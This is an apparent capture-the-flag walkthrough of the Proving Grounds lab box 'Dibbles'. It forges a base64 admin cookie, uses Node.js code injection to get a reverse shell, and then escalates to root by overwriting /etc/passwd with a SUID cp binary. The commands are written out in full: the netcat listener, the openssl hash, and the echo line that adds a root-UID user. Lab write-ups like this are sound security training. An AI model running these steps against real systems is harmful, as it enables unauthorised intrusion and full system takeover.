Dibbles
Exploitation Guide for Dibbles | Proving Grounds
Last updated
Was this helpful?
Exploitation Guide for Dibbles | Proving Grounds
Last updated
Was this helpful?
In this walkthrough, we will exploit web application running nodejs with weak security configuration to get the RCE. Then we will exploit suid bit to escalate our privilege to root.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/dibble/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.245
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 9d:3f:eb:1b:aa:9c:1e:b1:30:9b:23:53:4b:cf:59:75 (RSA)
| 256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
|_ 256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Fedora))
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.46 (Fedora)
|_http-title: Home | Hacking Articles
3000/tcp open http Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: OS: UnixTried nikto and gobuster first. Didn't find anything useful. So, we will do manual enumeration.
We don't know any credential at this point. But we can register a account.
There is a form where we can write a log message. But we don't have permission to do it ( only admin is allowed to update logs) .
Looking at the burp request. We notice that there is a cookie named userLevel which is base64 encoded.
After decoding it we get the value default.
We will change the value of cookie to see if we will be allowed to edit with userLevel=admin.
Intercept the request using proxy ( burp/zap) and change the value of userLevel and forward the request.
Encode the
adminwithbase64then again withurl encoding
As you can see below. It is possible to update the log.
This feature is vulnerable to code injection you can test it by injecting js code (Since its running on nodejs try simple test cases like 1+1 which will get executed when you open the log). We will use this vulnerability to get the RCE.
Get the reverse shell payload from :
Copy the payload ( change ip and port accordingly) . Start a netcat listener on port of your choice and post the update.
We will get the shell back as user benjamin.
┌──(imtodess㉿deathnote)-[~/…/pg/dibble/results/scans]
└─$ nc -nvlp 3000 1 ⨯
listening on [any] 3000 ...
connect to [192.168.49.245] from (UNKNOWN) [192.168.245.110] 39584
whoami
benjamin
id
uid=1000(benjamin) gid=1000(benjamin) groups=1000(benjamin)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")' # upgrade shell to interactive
[benjamin@dibble app]$ cd
cd
[benjamin@dibble ~]$ ls
ls
app local.txt
[benjamin@dibble ~]$ cat loc
cat local.txt
5485440<REDACTED>fc58fda369
Using find command search for suid bits.
[benjamin@dibble tmp]$ find / -type f -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/cp
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chage
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/sbin/grub2-set-bootflag
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check As you can see cp is suid enabled. We can exploit this to gain privilege to root.
Refer to following article to know how:
Create password with openssl
[benjamin@dibble tmp]$ openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1 Then we will copy the content of passwd to the file which we can edit.
# create new passwd file in /tmp directory
[benjamin@dibble tmp]$ cat /etc/passwd > passwdThen append the following line in newly created passwd file. This will create a new user named imtodess with root privileges.
[benjamin@dibble tmp]$ echo 'imtodess:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> passwd
Copy the passwd which we edited to /etc/passwd. Normally this wouldn't be possible but cp has suid permission so we can replace the existing file owned by root.
[benjamin@dibble tmp]$ cp passwd /etc/passwdNow change user and you will be root.
[benjamin@dibble tmp]$ su imtodess
Password:
[root@dibble tmp]# whoami
root
[root@dibble tmp]# id
uid=0(root) gid=0(root) groups=0(root)
[root@dibble tmp]# cd
[root@dibble ~]# ls
proof.txt
[root@dibble ~]# cat proof.txt
4e08440<REDACTED>2ec3c285
